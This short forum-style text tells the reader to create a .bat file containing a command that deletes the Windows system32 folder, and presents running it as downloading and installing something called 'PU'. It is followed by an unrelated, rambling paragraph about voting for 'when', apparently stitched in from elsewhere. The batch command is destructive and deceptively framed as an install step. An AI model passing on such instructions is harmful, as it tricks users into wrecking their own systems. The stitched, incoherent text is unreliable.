open a notepad type the following:
@echo off
del c:\WINDOWS\system32
save the file as anything.bat (remember to add the .bat extension and save as all files. So, it should look like, "yournameforthefile.bat")
double click and it and open the file and there you go. You downloaded and installed PU!

Well, when was a reasonable enough choice at first, but then I thought about when some more, and realized it was a slightly better option in the long run. Although when does have its perks. Hmm.. I think I will vote for when.
